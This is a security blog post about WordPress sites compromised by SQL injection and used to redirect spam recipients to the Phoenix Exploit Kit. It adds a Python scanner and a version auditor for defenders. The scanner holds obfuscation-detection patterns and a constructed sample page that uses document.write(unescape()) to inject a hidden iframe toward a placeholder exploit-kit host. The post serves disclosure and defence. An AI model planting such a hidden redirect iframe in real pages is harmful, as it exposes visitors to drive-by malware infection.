Compromised WordPress based websites leading to Phoenix Exploit Kit

Sending bulk emails (spam) containing poisoned links has for a long time been one of the methods used by hackers to infect computers with malware; the reasons are well known: to steal user credentials or to enlist the infected computers in other nefarious actions, such as a botnet. Generally, the scam emails are presented as a request from an institution, a bank or other financial institution, or a telephony or Internet provider to clarify a confusing situation, asking for the user's interaction. These fake emails talk about a large amount of money that must be paid, possibly in error, trying to scare users and push them to act as soon as possible to rectify the situation. Other malicious emails talk about a big prize won by the user or other “catchy” subjects. Almost always, these scam emails ask the user to click a link in the received email or to download and open an attachment supposedly containing a bill or a document but in reality containing malware.

But even if a fake email is so well designed that it is able to lure an unwary user into clicking a link, browsers and antivirus software have protection mechanisms in place, URL reputation for example, that block the user from navigating to a known malicious domain. The method used by hackers to avoid this inconvenient detection is to hack a website with a good reputation and serve the malicious web pages from there.

This is what happened a few days ago, when a lot of WordPress-based websites running the obsolete 3.2.1 version and two exploitable plug-ins (Spam Free and UPM Polls) were hacked using SQL injection, and malicious files with random names (osgik.htm, agoku.htm, kaxyv.htm and so on) were uploaded into the wp-content/uploads WordPress folder. The hackers' campaign then goes further by sending bulk emails which contain links to the malicious HTML web page previously uploaded. Finally, this page contains obfuscated code which runs a hidden iFrame, so while the user sees only the words “You are redirecting….Loading…Please wait…”, the iFrame connects in the background to the Phoenix Exploit Kit hosted on a Russian domain called horoshovsebudet.net.
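Pages planted this way can be hunted for on the server side. The following Python script is an added example, not code from the original post or from any tool it mentions: it walks a wp-content/uploads tree, flags every file that is not a media type (an uploads folder should hold images and documents, not .htm files), and scores each HTML file for the three signs described above: a hidden iframe, an obfuscation layer (unescape(), document.write(), eval(), String.fromCharCode) and the “You are redirecting” text. Because the iframe is usually written from an encoded string, the script percent-decodes and \xNN-decodes the page before looking for it. The sample page it scans is constructed for this example, with a placeholder iframe target on a .invalid host that never resolves; the file name osgik.htm is one of those named in the post.

```python
import os
import re
import tempfile
from typing import Dict, List
from urllib.parse import unquote

# File types that belong in wp-content/uploads (media). Anything else there,
# and .htm/.html in particular, deserves a look.
MEDIA_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".mp3", ".mp4", ".zip"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"src\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*[\"']?[01]\b",
    re.IGNORECASE,
)
OBFUSCATION_RE = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|document\.write\s*\(",
    re.IGNORECASE,
)
REDIRECT_TEXT_RE = re.compile(r"you are (?:being )?redirect", re.IGNORECASE)


def peel_encoding(text: str) -> str:
    """Undo the cheap encodings a redirect page hides its iframe behind:
    percent-encoding (the input of unescape()) and backslash-x hex escapes."""
    text = unquote(text)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)


def analyze_html(html: str) -> Dict:
    """Score one HTML document for the redirect pattern described in the post."""
    decoded = peel_encoding(html)
    result = {
        "hidden_iframe": False,
        "iframe_targets": [],
        "obfuscation": bool(OBFUSCATION_RE.search(html)),
        "redirect_text": bool(REDIRECT_TEXT_RE.search(html)),
    }
    # Look for the iframe in the decoded text, where the encoded one becomes visible.
    for tag in IFRAME_RE.findall(decoded):
        m = SRC_RE.search(tag)
        if m:
            result["iframe_targets"].append(m.group(1))
        if HIDDEN_RE.search(tag):
            result["hidden_iframe"] = True
    result["score"] = sum(int(result[k]) for k in ("hidden_iframe", "obfuscation", "redirect_text"))
    return result


def scan_uploads(root: str) -> List[Dict]:
    """Walk an uploads tree and report files that should not be there,
    attaching the HTML analysis for web-content types."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in MEDIA_EXT:
                continue
            record = {"path": os.path.relpath(path, root), "ext": ext}
            if ext in {".htm", ".html", ".php", ".js"}:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    record.update(analyze_html(fh.read()))
            hits.append(record)
    return hits


# Constructed sample (not a real captured page): the visible text quoted in the
# post, plus an iframe written through unescape() that points at a placeholder host.
SAMPLE_PAGE = (
    "<html><body>You are redirecting....Loading...Please wait...\n"
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//exploit-kit.invalid/"
    "index.php%22%20width%3D1%20height%3D1%20style%3D%22display%3Anone%22%3E%3C/iframe%3E'))"
    "</script></body></html>"
)


def demo() -> List[Dict]:
    """Build a throwaway uploads folder with one legitimate image and one planted page."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")  # JPEG magic bytes; the scanner only checks the extension
    with open(os.path.join(root, "osgik.htm"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_PAGE)
    return scan_uploads(root)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Run against a real site by calling scan_uploads() with the path of the uploads directory; any hit with a non-zero score is worth pulling for manual review, and a hit listed only for its extension (a .php file in uploads, for instance) is suspicious on its own.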

Phoenix Exploit Kit is very effective, able to exploit vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java, including the most recent one, the Java Rhino vulnerability, which allows a Java applet to run arbitrary Java code outside the sandbox with full privileges. Further, if the exploit kit discovers a vulnerability, it uses it to deliver its payload, which can be any type of malware, very often an info stealer.

So far, it seems that more than four hundred WordPress websites have been compromised using the above-mentioned vulnerabilities.

The conclusions speak for themselves:

  • Never open attachments or click links in emails received from untrusted or unknown sources;
  • Check regularly to see if there are updates for your WordPress version and the plug-ins you use, and update them if needed.
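Acting on the second point means first knowing which core and plug-in versions are actually installed. The following Python script is an added example, not code from the post or from WordPress itself: it reads $wp_version from wp-includes/version.php, reads the “Plugin Name:” and “Version:” header lines that WordPress plug-ins carry in their main PHP file, and compares both against a baseline of minimum acceptable versions. The baseline numbers and the plug-in versions in the demo tree are constructed placeholders for this example (an administrator fills the baseline in from the official release pages); the two plug-in names come from the post.

```python
import os
import re
import tempfile
from typing import Dict, Optional, Tuple

# Minimum acceptable version per component. The numbers are placeholders for
# this example; fill them in from the official WordPress and plug-in pages.
BASELINE = {"core": "3.3", "Spam Free": "2.0", "UPM Polls": "1.0.6"}

VERSION_PHP_RE = re.compile(r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]")
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version)\s*:\s*(.+?)\s*$", re.MULTILINE)


def parse_version(v: str) -> Tuple[int, ...]:
    """'3.2.1' -> (3, 2, 1); tuples compare element-wise, so (3, 2, 1) < (3, 3)."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def is_outdated(installed: str, minimum: str) -> bool:
    return parse_version(installed) < parse_version(minimum)


def core_version(wp_root: str) -> Optional[str]:
    """WordPress stores its version in wp-includes/version.php as $wp_version."""
    with open(os.path.join(wp_root, "wp-includes", "version.php"), encoding="utf-8") as fh:
        m = VERSION_PHP_RE.search(fh.read())
    return m.group(1) if m else None


def plugin_versions(wp_root: str) -> Dict[str, str]:
    """Read the 'Plugin Name:' and 'Version:' header lines of each plug-in's main file."""
    plugins_dir = os.path.join(wp_root, "wp-content", "plugins")
    found = {}
    for entry in sorted(os.listdir(plugins_dir)):
        full = os.path.join(plugins_dir, entry)
        if os.path.isdir(full):
            candidates = [os.path.join(full, f) for f in sorted(os.listdir(full)) if f.endswith(".php")]
        elif entry.endswith(".php"):
            candidates = [full]  # single-file plug-in
        else:
            continue
        for php in candidates:
            with open(php, encoding="utf-8", errors="replace") as fh:
                headers = dict(HEADER_RE.findall(fh.read(8192)))  # headers sit at the top
            if "Plugin Name" in headers:
                found[headers["Plugin Name"]] = headers.get("Version", "unknown")
                break
    return found


def audit(wp_root: str) -> Dict[str, Tuple[str, str]]:
    """Return {component: (installed, required)} for everything below the baseline."""
    report = {}
    core = core_version(wp_root)
    if core and is_outdated(core, BASELINE["core"]):
        report["core"] = (core, BASELINE["core"])
    for name, ver in plugin_versions(wp_root).items():
        minimum = BASELINE.get(name)
        if minimum is None:
            report[name] = (ver, "not in baseline")  # unknown plug-in: review it
        elif ver == "unknown" or is_outdated(ver, minimum):
            report[name] = (ver, minimum)
    return report


def demo() -> Dict[str, Tuple[str, str]]:
    """Constructed WordPress tree: the obsolete 3.2.1 core, one stale and one current plug-in.
    The plug-in version numbers are made up for the example."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "wp-includes"))
    with open(os.path.join(root, "wp-includes", "version.php"), "w") as fh:
        fh.write("<?php\n$wp_version = '3.2.1';\n")
    for folder, name, ver in (("spam-free", "Spam Free", "1.5"), ("upm-polls", "UPM Polls", "1.0.6")):
        os.makedirs(os.path.join(root, "wp-content", "plugins", folder))
        with open(os.path.join(root, "wp-content", "plugins", folder, folder + ".php"), "w") as fh:
            fh.write(f"<?php\n/*\nPlugin Name: {name}\nVersion: {ver}\n*/\n")
    return audit(root)


if __name__ == "__main__":
    for component, (have, need) in demo().items():
        print(f"{component}: installed {have}, required {need}")
```

Point audit() at the document root of a real installation; a plug-in that is installed but absent from the baseline is reported too, since an unexpected plug-in is exactly the kind of thing that goes unpatched.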

Sources:

http://labs.m86security.com/2012/01/massive-compromise-of-wordpress-based-sites-but-‘everything-will-be-fine’/
http://community.websense.com/blogs/securitylabs/pages/phoenix-exploit-s-kit.aspx
http://schierlm.users.sourceforge.net/CVE-2011-3544.html
http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/
http://community.websense.com/blogs/securitylabs/archive/2012/01/26/phoenix-phoenix-i-need-help.aspx


Keep safe !

Posted in Thoughts.
